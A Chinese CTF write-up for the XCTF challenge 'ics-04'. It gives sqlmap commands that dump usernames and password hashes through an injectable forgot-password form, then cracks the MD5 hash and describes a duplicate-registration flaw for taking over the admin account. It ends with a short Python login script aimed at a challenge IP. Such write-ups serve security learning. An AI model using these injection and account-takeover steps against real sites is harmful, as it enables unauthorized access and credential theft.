XCTF-高手进阶区:ics-04
题目:
解题思路:
注入点在忘记密码处,使用sqlmap一把梭
sqlmap -r 1.txt --dbs --batch
sqlmap -r 1.txt --dbs --batch -D cetc004 -T user -C 'username,password' --dump
直接解密md5,解密网址:https://www.somd5.com/
然后使用c3tlwDmIn23登录,即可获得flag
注:如果md5无法解密还可使用如下方法
1、利用可以重复注册的漏洞,测试方法,使用c3tlwDmIn23作为用户名重新注册,设置自己知道的密码,然后登陆,即可获得flag
2、网上还有一种,使用py脚本,但目前无法显示flag了,只有正确的密码才可以。经过抓包发现他不是前端md5加密,再和后端数据库中加密后的密码进行比对;有可能是后端md5加密,然后再进行比对
贴一下代码:如果以后有类似题目,可以参考
import requestsurl = 'http://159.138.137.79:61667/login.php'
username = 'c3tlwDmIn23'
password = '2f8667f381ff50ced6a3edc259260ba9'
data = {'username':username,'password':password}
req = requests.post(url,data=data)
req.encoding='utf-8'
print (req.text)
XCTF-高手进阶区:ics-04相关推荐
- 攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth)WriteUp
文章目录 解题部分 总结: 解题部分 题目来源 攻防世界web高手进阶区ics-05(XCTF 4th-CyberEarth) 1.拿到题目以后,发现是一个index.php的页面,并且设备-没有显示 ...
- 攻防世界 web高手进阶区 10分题 weiphp
前言 继续ctf的旅程 开始攻防世界web高手进阶区的10分题 本文是weiphp的writeup 解题过程 进入界面 点击 进入一个登陆界面 没有注册 那肯定得找源码了 惯例源码+御剑 发现git泄 ...
- 攻防世界 web高手进阶区 8分题 Web_python_block_chain
前言 继续ctf的旅程 开始攻防世界web高手进阶区的8分题 本文是Web_python_block_chain的writeup 解题过程 这是个区块链题 这..裂开了啊 没搞过区块链 从零开始学习 ...
- 攻防世界 Reverse高手进阶区 2分题 reverse-for-the-holy-grail-350
前言 继续ctf的旅程 攻防世界Reverse高手进阶区的2分题 本篇是reverse-for-the-holy-grail-350的writeup 发现攻防世界的题目分数是动态的 就仅以做题时的分数 ...
- 攻防世界 web高手进阶区 9分题 favorite_number
前言 继续ctf的旅程 开始攻防世界web高手进阶区的9分题 本文是favorite_number的writeup 解题过程 进入界面 简单的代码审计 首先是个判断,既要数组强等于,又要首元素不等 然 ...
- 攻防世界 Crypto高手进阶区 3分题 wtc_rsa_bbq
前言 继续ctf的旅程 攻防世界Crypto高手进阶区的3分题 本篇是wtc_rsa_bbq的writeup 发现攻防世界的题目分数是动态的 就仅以做题时的分数为准了 解题过程 得到一个无后缀文件 扔 ...
- 攻防世界高手进阶区——dice_game
攻防世界高手进阶区--dice_game 题目里面啥都没有. 一.分析文件 checksec 只有栈溢出保护关闭了,其他都是开着的. 运行 可以看出是要猜数字,猜对50次. ida逆向 __int64 ...
- 攻防世界高手进阶区 ——forgot
攻防世界高手进阶区 --forgot 看了半天,啥也没看懂,做出来了才发现啥也不是. 一,分析文件 checksec 还好,只开启了堆栈不可执行. 运行一下 翻译了一下,应该是判断邮箱是否合乎规矩. ...
- forgot [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列13
题目地址:forgot 本题是高手进阶区的第二题,恭喜大家已经进入高手行列!好假好假,哈哈哈! 废话不说,看看题目先 这个题目有很长的描述,但是都是废话,不去管他了. 照例下载附件,做下安全检查 ro ...
- 攻防世界 Crypto高手进阶区 3分题 你猜猜
前言 继续ctf的旅程 攻防世界Crypto高手进阶区的3分题 本篇是你猜猜的writeup 发现攻防世界的题目分数是动态的 就仅以做题时的分数为准了 解题过程 得到一串16进制 504B03040A ...
最新文章
- 慕课网基于ElasticSearch的找房网实战开发企业级房屋搜索网项目学习心得(一)
- android java服务器文件传输_java – 使用FTPS将文件从android传输到服务器
- 水晶报表钻取(深化)之分组法
- Linux循环链表删除节点,删除循环单链表开头元素
- 用c语言编写程序学工系统,[工学]chap02_用C语言编写程序.ppt
- numpy.arcsin详解
- 【NLP】使用BERT完成NLP任务
- 博客园2013年5月份第1周源码发布详情
- 【BZOJ4916】神犇和蒟蒻(杜教筛)
- centos7mysql语句创建表格_CentOS7中安装MySQL(简便)及 网站的搭建
- C++ 使用模板Template
- 6-6-阶段案例:传智书城JSP页面
- Java抽象类、接口和内部类
- GDAL库中WFS服务中含有中文不能获取数据的问题
- win8下IE10停止工作解决办法
- js 设置div超出宽度隐藏_【CSS/JS】如何实现单行/多行文本溢出的省略(...)--绕过坑道的正确姿势...
- 参考TLC5615基于verilog HDL实现SPI时序
- 西北大学2019年春季校赛题解(G-L)
- Mybatis | Mybatis-plus配置多数据源,连接多数据库
- 用脚本批量消除视频噪声